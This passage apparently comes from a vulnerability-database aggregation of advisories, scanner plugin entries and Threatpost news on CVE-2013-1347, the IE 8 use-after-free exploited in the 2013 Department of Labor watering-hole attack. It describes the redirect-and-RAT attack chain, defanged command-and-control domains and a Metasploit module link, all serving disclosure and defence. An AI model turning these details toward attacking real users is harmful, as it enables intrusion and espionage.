1.6.0 17 \n * Sun JRE (Windows Production Release) 1.6.0 01 \n * Sun JRE (Windows Production Release) 1.6.0 02 \n * Sun JRE (Windows Production Release) 1.6.0 03 \n * Sun JRE (Windows Production Release) 1.6.0 04 \n * Sun JRE (Windows Production Release) 1.6.0 05 \n * Sun JRE (Windows Production Release) 1.6.0 06 \n * Sun JRE (Windows Production Release) 1.6.0 07 \n * Sun JRE (Windows Production Release) 1.6.0 10 \n * Sun JRE (Windows Production Release) 1.6.0 11 \n * Sun JRE (Windows Production Release) 1.6.0 12 \n * Sun JRE (Windows Production Release) 1.6.0 13 \n * Sun JRE (Windows Production Release) 1.6.0 14 \n * Sun JRE (Windows Production Release) 1.6.0 15 \n * Sun JRE (Windows Production Release) 1.6.0 18 \n * Sun JRE (Windows Production Release) 1.6.0 19 \n * Sun JRE (Windows Production Release) 1.6.0 2 \n * Sun JRE (Windows Production Release) 1.6.0 20 \n * Sun JRE (Windows Production Release) 1.6.0 \n * Sun JRE (Windows Production Release) 1.6.0_21 \n * Sun JRE (Windows Production Release) 1.7 \n * Ubuntu Ubuntu Linux 10.04 ARM \n * Ubuntu Ubuntu Linux 10.04 Amd64 \n * Ubuntu Ubuntu Linux 10.04 I386 \n * Ubuntu Ubuntu Linux 10.04 Powerpc \n * Ubuntu Ubuntu Linux 10.04 Sparc \n * Ubuntu Ubuntu Linux 10.10 ARM \n * Ubuntu Ubuntu Linux 10.10 amd64 \n * Ubuntu Ubuntu Linux 10.10 i386 \n * Ubuntu Ubuntu Linux 10.10 powerpc \n * Ubuntu Ubuntu Linux 11.04 ARM \n * Ubuntu Ubuntu Linux 11.04 amd64 \n * Ubuntu Ubuntu Linux 11.04 i386 \n * Ubuntu Ubuntu Linux 11.04 powerpc \n * Ubuntu Ubuntu Linux 11.10 amd64 \n * Ubuntu Ubuntu Linux 11.10 i386 \n * VMWare ESX 3.5 \n * VMWare ESX 4.0 \n * VMWare ESX 4.1 \n * VMWare Update Manager 5.0 \n * VMWare VirtualCenter 2.5 \n * VMWare vCenter 4.0 \n * VMWare vCenter 4.1 \n * VMWare vCenter 5.0 \n * Xerox FreeFlow Print Server (FFPS) 73.B3.61 \n * Xerox FreeFlow Print Server (FFPS) 73.C0.41 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisabling the execution of script code in the browser may limit exposure to this and other latent vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references for more information. The payloads delivered by the exploit kits are detected by Symantec as 'Trojan.Zbot' and 'Trojan.Horse'.\n", "published": "2011-10-18T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/50218", "cvelist": ["CVE-2011-3544", "CVE-2013-1347"], "lastseen": "2018-03-12T06:25:14"}], "cert": [{"id": "VU:237655", "type": "cert", "title": "Microsoft Internet Explorer 8 CGenericElement object use-after-free vulnerability", "description": "### Overview\n\nMicrosoft Internet Explorer 8 contains a use-after-free vulnerability in the `CGenericElement` object, which is currently being exploited in the wild.\n\n### Description\n\n[Microsoft Security Advisory 2847140](<http://technet.microsoft.com/en-us/security/advisory/2847140>) states: \n\n_Internet Explorer 6, Internet Explorer 7, Internet Explorer 9, and Internet Explorer 10 are not affected by the vulnerability._ \n \n_This is a remote code execution vulnerability. The vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated. The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer. An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website._ \n\n\nAdditional details may be found in the [full advisory](<http://technet.microsoft.com/en-us/security/advisory/2847140>). A Metasploit module has been released to exploit this vulnerability as well. \n \n--- \n \n### Impact\n\nA remote unauthenticated attacker may be able to run arbitrary code in the context of the user running Internet Explorer 8. \n \n--- \n \n### Solution\n\n**Apply an Update** \n \nMicrosoft has released [MS13-038](<https://technet.microsoft.com/en-us/security/bulletin/ms13-038>) to address this vulnerability. The patch may be obtain through [Microsoft's Windows Update](<http://go.microsoft.com/fwlink/?LinkID=40747>). \n \nIf you are unable to upgrade, please consider the following workarounds. \n \n--- \n \n**Apply a Microsoft \"Fix It\"** \n \nMicrosoft has [released a Microsoft \"Fix It\" solution](<http://blogs.technet.com/b/srd/archive/2013/05/08/microsoft-quot-fix-it-quot-available-to-mitigate-internet-explorer-8-vulnerability.aspx>) for this vulnerability. The \"Fix It\" solution uses the Windows application compatibility toolkit to make a small change at runtime to mshtml.dll every time IE is loaded. \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://support.microsoft.com/kb/2458544>) (EMET) can be used to help prevent exploitation of this vulnerability. CERT/CC has created a [video tutorial for setting up EMET 3.0](<http://www.youtube.com/watch?v=28_LUs_g0u4>) on Windows 7. Note that platforms that do not support ASLR, such as Windows XP and Windows Server 2003, will not receive the same level of protection that modern Windows platforms will. While still in beta, [EMET 4.0](<http://www.microsoft.com/en-us/download/details.aspx?id=38761>) provides additional exploit mitigations that EMET 3.0 does not that will increase the difficulty of exploitation for an adversary. \n \n**Enable DEP in Microsoft Windows** \n \nConsider enabling Data Execution Prevention (DEP) in supported versions of Windows. DEP should not be treated as a complete workaround, but it can mitigate the execution of attacker-supplied code in some cases. Microsoft has published detailed technical information about DEP in Security Research & Defense blog posts \"Understanding DEP as a mitigation technology\" [part 1](<http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx>) and [part 2](<http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx>). DEP should be used in conjunction with the application of patches or other mitigations described in this document. \n \nNote that when relying on DEP for exploit mitigation, it is important to use a system that supports Address Space Layout Randomization (ASLR) as well. ASLR is not supported by Windows XP or Windows Server 2003 or earlier. ASLR was introduced with Microsoft Windows Vista and Windows Server 2008. Please see the Microsoft SRD blog entry: [On the effectiveness of DEP and ASLR](<http://blogs.technet.com/b/srd/archive/2010/12/08/on-the-effectiveness-of-dep-and-aslr.aspx>) for more details. \n \n--- \n \n### Vendor Information \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nMicrosoft Corporation| | -| 06 May 2013 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23237655 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.4 | AV:N/AC:L/Au:N/C:C/I:C/A:N \nTemporal | 8.9 | E:H/RL:W/RC:C \nEnvironmental | 6.7 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n### References\n\n * <https://technet.microsoft.com/en-us/security/bulletin/ms13-038>\n * <http://blogs.technet.com/b/srd/archive/2013/05/08/microsoft-quot-fix-it-quot-available-to-mitigate-internet-explorer-8-vulnerability.aspx>\n * <http://technet.microsoft.com/en-us/security/advisory/2847140>\n * <http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx>\n * <https://community.rapid7.com/community/metasploit/blog/2013/05/05/department-of-labor-ie-0day-now-available-at-metasploit>\n * <http://dev.metasploit.com/redmine/projects/framework/repository/revisions/a33510e82135355548a529e5f0cb5ab7134d674d/entry/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb>\n * <http://labs.alienvault.com/labs/index.php/2013/u-s-department-of-labor-website-hacked-and-redirecting-to-malicious-code/>\n\n### Credit\n\nThis vulnerability was discovered in the wild.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n * CVE IDs: [CVE-2013-1347](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347>)\n * Date Public: 03 May 2013\n * Date First Published: 06 May 2013\n * Date Last Updated: 14 May 2013\n * Document Revision: 28\n\n", "published": "2013-05-06T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/237655", "cvelist": ["CVE-2013-1347", "CVE-2013-1347"], "lastseen": "2016-02-03T09:13:26"}], "nessus": [{"id": "SMB_KB2847140.NASL", "type": "nessus", "title": "MS KB2847140: Vulnerability in Internet Explorer 8 Could Allow Remote Code Execution (deprecated)", "description": "The remote host is missing one of the workarounds referenced in KB 2847140. \n\nThe remote version of IE reportedly has a use-after-free flaw related to how CGenericElement objects are handled that could result in arbitrary code execution on the remote system.\n\nThis plugin has been deprecated due to the publication of MS13-038.\nMicrosoft has released updates that make the workarounds unnecessary.\nTo check for those, use Nessus plugin ID 66413.", "published": "2013-05-09T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=66329", "cvelist": ["CVE-2013-1347"], "lastseen": "2017-10-29T13:34:53"}, {"id": "SMB_NT_MS13-038.NASL", "type": "nessus", "title": "MS13-038: Security Update for Internet Explorer (2847204)", "description": "The remote host is missing Internet Explorer (IE) Security Update 2847204.\n\nThe installed version of IE is affected by a use-after-free vulnerability that could allow an attacker to execute arbitrary code.", "published": "2013-05-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=66413", "cvelist": ["CVE-2013-1347"], "lastseen": "2017-12-15T23:54:06"}], "threatpost": [{"id": "MICROSOFT-FIX-IT-AVAILABLE-FOR-IE-8-ZERO-DAY-USED-AGAINST-LABOR-WEBSITE/100419", "type": "threatpost", "title": "Microsoft Fix It a Temporary Patch for IE 8 Zero Day Flaw", "description": "Microsoft has released a Fix-It to address an Internet Explorer 8 zero-day that was exploited in a [watering hole attack against the U.S. Department of Labor website](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/>) last week.\n\nThe [Fix It](<http://blogs.technet.com/b/srd/archive/2013/05/08/microsoft-quot-fix-it-quot-available-to-mitigate-internet-explorer-8-vulnerability.aspx>) is a temporary mitigation until a patch is released. Microsoft\u2019s next scheduled Patch Tuesday security updates are set for next week, though it\u2019s unlikely an update for [CVE-2013-1347](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347>) will be ready in time.\n\n### Related Posts\n\n#### [EFF Blasts Microsoft Over \u2018Malicious\u2019 Windows 10 Rollout Tactics](<https://threatpost.com/eff-blasts-microsoft-over-malicious-windows-10-rollout-tactics/120006/> \"Permalink to EFF Blasts Microsoft Over \u2018Malicious\u2019 Windows 10 Rollout Tactics\" )\n\nAugust 18, 2016 , 4:38 pm\n\n#### [Latest Windows UAC Bypass Permits Code Execution](<https://threatpost.com/latest-windows-uac-bypass-permits-code-execution/119887/> \"Permalink to Latest Windows UAC Bypass Permits Code Execution\" )\n\nAugust 15, 2016 , 3:35 pm\n\n#### [Microsoft Mistakenly Leaks Secure Boot Key](<https://threatpost.com/microsoft-mistakenly-leaks-secure-boot-key/119828/> \"Permalink to Microsoft Mistakenly Leaks Secure Boot Key\" )\n\nAugust 11, 2016 , 11:31 am\n\nThe vulnerability is present only in IE 8, Microsoft said. The flaw is a [use-after free memory corruption bug](<http://technet.microsoft.com/en-us/security/advisory/2847140>) that would allow an attacker to be able to remotely execute code on a compromised machine.\n\n\u201cThe Fix It is an effort to help protect as many customers as possible, as quickly as possible,\u201d said Dustin Childs, group manager Trustworthy Computing.\n\nThis is the second Fix It that Microsoft has issued this year. The first was also for a similar memory-related vulnerability in IE in January that was used in watering hole attacks against a number of government, political and manufacturing websites. IE 8 was the primary culprit there as well, though IE 6 and 7 were also vulnerable yet no exploits were public for those two versions.\n\nAccording to Net Market Share, [IE 8 has the highest market share](<http://www.netmarketshare.com/browser-market-share.aspx?qprid=2&qpcustomd=0>) with 23 percent, followed by IE 9 (18 percent) and Chrome 26.0 (13 percent). Experts who analyzed the [attack against the Department of Labor\u2019s Site Exposure Matrices](<http://threatpost.com/ie-8-zero-day-found-as-dol-watering-hole-attack-spreads-to-nine-other-sites/>) website said that the typical government agency worker would likely still be running IE 8, making them a tempting target for such an attack.\n\n[Watering hole attacks](<http://threatpost.com/why-watering-hole-attacks-work-032013/>) are similar to drive-by downloads where an ad or a streaming file on a website is vulnerable to an iFrame attack. Javascript is injected into a Flash or Java applet that redirects the user to a third-party site where more malware is downloaded or credentials are stolen. The concept here is that the attacker infects a site of specific interest to their target, rather than spear phishing a narrow list of potential victims.\n\nThis tactic has been employed not only against government workers and political activists as part of espionage campaigns, but against a popular mobile developer\u2019s website that ensnared a number of Facebook, Apple, Microsoft and Twitter employees.\n\nIn the case of the DoL, the target was likely downstream employees of the Department Energy who work on nuclear weapons programs, experts at Invincea speculated. The DoL\u2019s SEM site is a resource for employees who may have been exposed to radiation. The redirect on the site was sending visitors to a site hosting the Poison Ivy remote access Trojan, malware that is used espionage campaigns; it opens a backdoor on compromised computers where attackers can move about unnoticed.\n\nMicrosoft\u2019s first Fix It of 2013, however, wasn\u2019t a smashing success. Shortly after it was released, researchers at Exodus Intelligence reported they were able to [bypass](<http://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>) it. While the Fix It did address one means attackers had at their disposal to get onto victims\u2019 machines, it didn\u2019t address all possible avenues.", "published": "2013-05-09T12:04:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/microsoft-fix-it-available-for-ie-8-zero-day-used-against-labor-website/100419/", "cvelist": ["CVE-2013-1347"], "lastseen": "2016-09-04T20:44:55"}, {"id": "USAID-WORKERS-ALSO-TARGETED-BY-DOL-WATERING-HOLE-ATTACKERS/100528", "type": "threatpost", "title": "USAID a Target of DoL Watering Hole Attackers", "description": "One of the nine sites serving malware tied to the recent [watering hole attack on the U.S. Department of Labor](<http://threatpost.com/ie-8-zero-day-found-as-dol-watering-hole-attack-spreads-to-nine-other-sites/>) was located in Cambodia and has ties to the United States Agency for International Development (USAID).\n\nSpeculation has it that the [DoL attack was targeting downstream employees at the Department of Energy](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/>) who work on nuclear weapons programs. This site, meanwhile, was apparently after employees of USAID, which is a federal organizations that funnels assistance to impoverished or oppressed nations.\n\n### Related Posts\n\n#### [Chrome Defaults to HTML5 over Adobe Flash Starting in Q4](<https://threatpost.com/chrome-defaults-to-html5-over-adobe-flash-starting-in-q4/118109/> \"Permalink to Chrome Defaults to HTML5 over Adobe Flash Starting in Q4\" )\n\nMay 16, 2016 , 11:37 am\n\n#### [Platinum APT Group Abuses Windows Hotpatching](<https://threatpost.com/platinum-apt-group-abuses-windows-hotpatching/117692/> \"Permalink to Platinum APT Group Abuses Windows Hotpatching\" )\n\nApril 27, 2016 , 10:28 am\n\n#### [Zerodium Hosts Million-Dollar iOS 9 Bug Bounty](<https://threatpost.com/zerodium-hosts-million-dollar-ios-9-bug-bounty/114736/> \"Permalink to Zerodium Hosts Million-Dollar iOS 9 Bug Bounty\" )\n\nSeptember 21, 2015 , 10:20 am\n\nResearcher [Eric Romang](<http://eromang.zataz.com/2013/05/12/dol-watering-hole-campaign-and-sexy-swedish-soccer-supporter/>) found a connection to University Research Co. of Cambodia, a USAID partner in that country, and the dol[.]ns01[.]us backend serving malware to visitors of the DoL\u2019s Site Matrices Exposures website. The sites were compromised and serving javascript that redirects victims using Internet Explorer 8 to sites where additional malware, such as the Poison Ivy remote access Trojan, is downloaded and backdoor connections are established. The IE 8 zero day vulnerability, CVE-2013-1347, is expected to be patched tomorrow by Microsoft, which released a [Fix It temporary mitigation](<http://threatpost.com/microsoft-fix-it-available-for-ie-8-zero-day-used-against-labor-website/>) last Thursday.\n\nThe DoL\u2019s Site Matrices Exposures site is a repository of data on toxic substances present at nuclear facilities run by the Department of Energy. The infected Cambodian site is a page belonging to the Better Health Services project, a USAID-funded initiative to strengthen health care services in Cambodia. Researchers at Invicea and AlienVault also said that European aerospace, defense and security companies were also compromised, but none have been identified.\n\nThe attacks targeting USAID used social media accounts on Twitter and Facebook to entice victims to click on shortened URLs leading them to the University Research Co. website, Romang said.\n\nRomang found a connection referrer to the website on the backend server used in the attack. He discovered a Twitter account created on March 18 from @natividad_usaid that was providing links to the infected site; the Twitter account was deleted on April 10.\n\n\u201cSome Twitter users were directly contacted in order to incite them to click to the link and most of these users were related to USAID,\u201d Romang said.\n\nEven the link listed in the Twitter account\u2019s profile description contained a malicious shortened url leading users to a file hosted on a Dropbox account that Romang said is a direct link to the Poison Ivy malware.\n\nThe file establishes a connection to a command and control server microsoftUpdate[.]ns1[.]name and drops an executable called conime[.]exe which opens remote connections on ports 443 and 53, according to Invicea, and registry changes are made to maintain persistence on infected machines.\n\nA second connection referrer was found, Romang said, this one to a phony Facebook profile for a supposed USAID employee Kelly Black, a University of Virginia graduate living in D.C. The account included a profile picture of two young blonde women and was created and deleted on March 24, Romang said. The account was busy, however, finding 41 friends\u2014most with ties to USAID\u2014and each post contained a link to the University Research Co. and messages about a Mekong water sanitation project. One curious Facebook friend of Kelly Black\u2019s wanted to know which woman she was in the picture, which turns out was of a couple of supporters of the Swedish national soccer team taken during the 2012 European championships in Poland, Romang said.\n\nMicrosoft urges IE 8, at a minimum, to apply the Fix It for the zero day until a patch is released. The vulnerability is a remote-code execution use-after free flaw, which happens because of how the browser handles objects after they\u2019ve been deleted.\n\nFrom the initial analysis of the javascript on the DoL site, it collects system information checking for a number of antimalware programs, as well as third-party software such as Flash and Java, likely in order to launch further exploits. Blasco added that the command and control protocol used in the attack matches that of a Chinese espionage gang known as DeepPanda; other characteristics of this attack match those used against a Thai human rights nongovernment organization website.\n\nThe Poison Ivy RAT, meanwhile, is a backdoor that an attacker can use to remotely access compromised machines and add or delete files, edit Registry files, view or kill running processes, network connections and services, and add or delete applications. It can be used for espionage as well as some variants have the capability to start remote command shells, take screenshots, start audio or video recordings and drop keylogging software.\n\nPhoto: Ryan Rodrick Beiler / Shutterstock.com", "published": "2013-05-13T10:52:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/usaid-workers-also-targeted-by-dol-watering-hole-attackers/100528/", "cvelist": ["CVE-2013-1347"], "lastseen": "2016-09-04T20:47:10"}, {"id": "MICROSOFT-PATCHES-DEPARTMENT-OF-LABOR-PWN2OWN-IE-VULNERABILITIES/100633", "type": "threatpost", "title": "Microsoft Patches IE Zero Day Used In Watering Hole Attack", "description": "Microsoft wasted no time today delivering a patch for the Internet Explorer 8 vulnerability being exploited in [watering hole attacks](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/>) carried out against the U.S. Department of Labor website and nine others worldwide. Today\u2019s Patch Tuesday security updates also include a fix for IE vulnerabilities exploited during the Pwn2Own Contest earlier this year.\n\nDetails on the DoL attack quickly emerged following the initial reports on May 1 that the agency\u2019s Site Matrices Exposures site has been compromised and likely targeting DoE researchers working on nuclear weapons programs. This week it was revealed that a [site in Cambodia was also serving malware](<http://threatpost.com/usaid-workers-also-targeted-by-dol-watering-hole-attackers/>) exploiting IE 8 vulnerabilities targeting workers for the United States Agency for International Development (USAID).\n\n### Related Posts\n\n#### [Microsoft Mistakenly Leaks Secure Boot Key](<https://threatpost.com/microsoft-mistakenly-leaks-secure-boot-key/119828/> \"Permalink to Microsoft Mistakenly Leaks Secure Boot Key\" )\n\nAugust 11, 2016 , 11:31 am\n\n#### [Windows PDF Library Flaw Puts Edge Users at Risk for RCE](<https://threatpost.com/windows-pdf-library-flaw-puts-edge-users-at-risk-for-rce/119773/> \"Permalink to Windows PDF Library Flaw Puts Edge Users at Risk for RCE\" )\n\nAugust 9, 2016 , 2:59 pm\n\n#### [A Month Without Adobe Flash Player Patches](<https://threatpost.com/a-month-without-adobe-flash-player-patches/119770/> \"Permalink to A Month Without Adobe Flash Player Patches\" )\n\nAugust 9, 2016 , 12:50 pm\n\nMicrosoft urges consumers and business users still on IE 8 to patch the browser immediately, or upgrade to newer versions. In the meantime, some experts are calling on Microsoft to consider revamping its browser update method to perhaps model that used by Mozilla and Google.\n\n\u201cOn one level, this is Microsoft at their security best. They responded promptly to a publicly disclosed issue and got the fix out in the next scheduled wave of patches,\u201d said Rapid7 senior manager of security engineering Ross Barrett. \u201cOn another level, this issue, along with the fact that every single month we see another round of critical Internet Explorer patches, highlights what is wrong with Microsoft\u2019s patching and support models.\u201d\n\nMicrosoft has updated IE in every Patch Tuesday update this year, including an out-of-band patch in January that resolved a vulnerability used in another watering hole attack.\n\n\u201cCompare this to Google\u2019s Chrome browser, which quietly patches itself as fixes become available and has no down-level supported \u2018old version,\u2019 which exposes millions of their users to risk. Or compare it to Firefox, which has straddled the fence with periodic Long-Term-Support (LTS) releases for the risk adverse IT departments but now defaults it\u2019s users to the same model as Chrome,\u201d Barrett said. \u201cMicrosoft is tying up resources in maintaining the older versions and extending the window by which users are exposed to risk with their opt-in updates and periodic patching model.\u201d\n\nMicrosoft resolves the IE 8 bug in [MS13-038](<https://technet.microsoft.com/en-us/security/bulletin/ms13-038>), one of 10 bulletins released today. The critical update supplants a [temporary Fix-It mitigation](<http://threatpost.com/microsoft-fix-it-available-for-ie-8-zero-day-used-against-labor-website/>) Microsoft released last week, a MSHTML Shim Workaround for [CVE-2013-1347](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347>). The vulnerability is present in IE 8 only and is a use-after-free memory corruption flaw that enables remote code execution, and while IE 8 is an old version of the browser, it still has the highest market share with 23 percent, according to Net Market Share.\n\n[MS 13-037](<https://technet.microsoft.com/en-us/security/bulletin/ms13-037>), meanwhile, also has expert concerned now that details are public. It is a cumulative update for IE that addresses the Pwn2Own vulnerabilities exploited by security company VUPEN.\n\nVUPEN CEO Chaouki Bekrar told Threatpost his researchers used four zero-day exploits against Microsoft products during Pwn2Own, including an memory corruption, sandbox and ASLR-bypass bugs affecting IE 6-10.\n\n\u201cThe exploit is rated a \u20181\u2019 on the Microsoft Exploitability Index, meaning that Microsoft expects exploits to be developed within the next 30 days and that the attack vector would be a malicious website,\u201d said Wolfgang Kandek, Qualys CTO. \u201cPatch this vulnerability as soon as possible.\u201d\n\n[MS13-039](<https://technet.microsoft.com/en-us/security/bulletin/ms13-039>), meanwhile, is rated important, but could lead to a denial-of-service condition on boxes running Windows\u2019 IIS webserver software. The vulnerability could be disruptive to organizations running remote services or Active Directory integrations on http.sys.\n\n\u201cThe good news is that only Windows 2012 web servers are affected. All IT security teams should be jump on this quickly as an exploit is likely to be developed very quickly. A successful exploit could cause a DoS on affected servers creating temporary outages,\u201d said Andrew Storms, director of security operations for nCircle, a Tripwire company. \u201cThe bad news is that a successful exploit of this bug could have serious implications for public web servers without some kind of inline IPS in front of them. Essentially, any user could launch a simple attack and the server will essentially be offline. It\u2019s also worthwhile to note that many Microsoft servers have IIS turned on \u2014 including Exchange and SharePoint\u2013 so a successful exploit could potentially impact critical company infrastructure.\u201d\n\nThe remainder of the bulletins were rated important by Microsoft and include a number of remote code execution, information leakage and privilege escalation bugs.\n\n * [MS13-40](<http://technet.microsoft.com/en-us/security/bulletin/ms13-040>): patches a spoofing vulnerability the .NET framework that could allow an attacker to modify the contents of an XML file\n * [MS13-41](<http://technet.microsoft.com/en-us/security/bulletin/ms13-041>): fixes a flaw on Microsoft Lync that could enable remote code execution if an attacker tricks a user into viewing malicious content.\n * [MS13-42](<http://technet.microsoft.com/en-us/security/bulletin/ms13-042>): takes care of vulnerabilities in Microsoft Publisher that could allow an attacker to remotely execute code if a user opens a malicious Publisher file\n * [MS13-43](<http://technet.microsoft.com/en-us/security/bulletin/ms13-043>): patches a Word flaw that could give an attacker the same privileges as the user on a compromised machine.\n * [MS13-44](<http://technet.microsoft.com/en-us/security/bulletin/ms13-044>): is a Visio vulnerability that could lead to information disclosure if a user opens an infected Visio file.\n * [MS13-45](<http://technet.microsoft.com/en-us/security/bulletin/ms13-045>): repairs a Windows Essentials vulnerability that could lead to information disclosure if a user opens Windows Writer using a malicious URL.\n * [MS13-46](<http://technet.microsoft.com/en-us/security/bulletin/ms13-046>): is a privilege escalation vulnerability in Kernel-Mode Drivers that happens if an attacker logs onto a system with valid credentials and runs a malicious application.", "published": "2013-05-14T16:14:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/microsoft-patches-department-of-labor-pwn2own-ie-vulnerabilities/100633/", "cvelist": ["CVE-2013-1347"], "lastseen": "2016-09-04T20:52:47"}, {"id": "IE-8-ZERO-DAY-FOUND-AS-DOL-WATERING-HOLE-ATTACK-SPREADS-TO-NINE-OTHER-SITES/100212", "type": "threatpost", "title": "IE 8 Zero Day Widens Scope of DoL Watering Hole Attack", "description": "The scope of a [watering hole attack targeting the U.S. Department of Labor website](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/>) widened significantly over the weekend. Researchers are reporting that as many as nine websites, including a European aerospace, defense and security manufacturer as well as a number of non-profit organizations have also been compromised and are redirecting visitors to a website hosting malware.\n\nMicrosoft, meanwhile, released an [advisory](<http://technet.microsoft.com/en-us/security/advisory/2847140>) warning Internet Explorer 8 users that the attackers are exploiting a zero-day vulnerability in Internet Explorer 8, and [not CVE-2012-4792](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) as originally was reported. Yesterday morning, a [Metasploit module](<https://community.rapid7.com/community/metasploit/blog/2013/05/05/department-of-labor-ie-0day-now-available-at-metasploit>) was released for this vulnerability, heightening the likelihood of additional attacks or inclusion into a commercial or private exploit kit.\n\n### Related Posts\n\n#### [Patched IE Zero Day Incorporated into Neutrino EK](<https://threatpost.com/patched-ie-zero-day-incorporated-into-neutrino-ek/119321/> \"Permalink to Patched IE Zero Day Incorporated into Neutrino EK\" )\n\nJuly 15, 2016 , 4:16 pm\n\n#### [ScarCruft APT Group Used Latest Flash Zero Day in Two Dozen Attacks](<https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/> \"Permalink to ScarCruft APT Group Used Latest Flash Zero Day in Two Dozen Attacks\" )\n\nJune 17, 2016 , 6:00 am\n\n#### [Fix Coming for Flash Vulnerability Under Attack](<https://threatpost.com/fix-coming-for-flash-vulnerability-under-attack/118652/> \"Permalink to Fix Coming for Flash Vulnerability Under Attack\" )\n\nJune 14, 2016 , 12:59 pm\n\nMicrosoft urges IE 8 users to upgrade to a newer version of the browser\u2014IE 6, 7, 9 and 10 are not vulnerable\u2014and that it will either release an out-of-band patch or address the flaw in an upcoming Patch Tuesday release. The next scheduled Microsoft security updates are next week.\n\nThe original outbreak was made public May 1 when it was reported that the DoL\u2019s Site Exposure Matrices website was infected and attackers had injected javascript via an iFrame that redirected site visitors to a site hosting the Poison Ivy remote access Trojan.\n\nThe espionage malware was originally thought to be exploiting a use-after free memory corruption vulnerability that Microsoft had patched earlier this year. The DoL\u2019s SEM site is a repository of data on toxic substances present at facilities run by the Department of Energy, and researchers at Invincea speculated that the attackers\u2019 targets were downstream employees of the Department of Energy who work on nuclear weapons programs.\n\nInvincea CTO and founder Anup Ghosh confirmed that a [previously unreported use-after free vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347>) was being exploited in this attack and that only IE 8 was affected. Ghosh said his researchers were still able to [reproduce an infection](<http://www.invincea.com/2013/05/part-2-us-dept-labor-watering-hole-pushing-poison-ivy-via-ie8-zero-day/>) on a Windows XP machine running Windows 8 that was patched with MS13-008 that addressed CVE-2012-4792.\n\nMicrosoft confirmed in its advisory that this is a remote code execution vulnerability, and that IE does not properly handle objects in memory that have been deleted or not properly allocated. Microsoft suggests that users take caution when sent links via email or IM messages. In the meantime, Microsoft suggests setting Internet and local intranet security zones to \u201chigh\u201d to block ActiveX Controls and Scripting, as well as to configure IE to prompt before running Active Scripting.\n\nThe malware drops an executable called conime[.]exe onto the infected computer and opens remote connections on ports 443 and 53, Invincea said, adding there were two redirects present on the DoL page sending visitors to dol[.]ns01[.]us. Once the user is redirected, a file is executed, ports are opened and registry changes are made to maintain persistence on the machine. Ghosh said that one of the command and control servers had already been blacklisted by Google.\n\nAlien Vault Lab manager Jaime Blasco said that researchers had detected [redirects to another server](<http://labs.alienvault.com/labs/index.php/2013/new-internet-explorer-zeroday-was-used-in-the-dol-watering-hole-campaign/>) at sellagreement[.]com. That domain was also serving some of the malicious payloads found on dol[.]ns01[.]us. Blasco recommends checking logs for connections to either of those domains.\n\nFrom the initial analysis of the javascript on the DoL site, it collects system information checking for a number of antimalware programs, as well as third-party software such as Flash and Java, 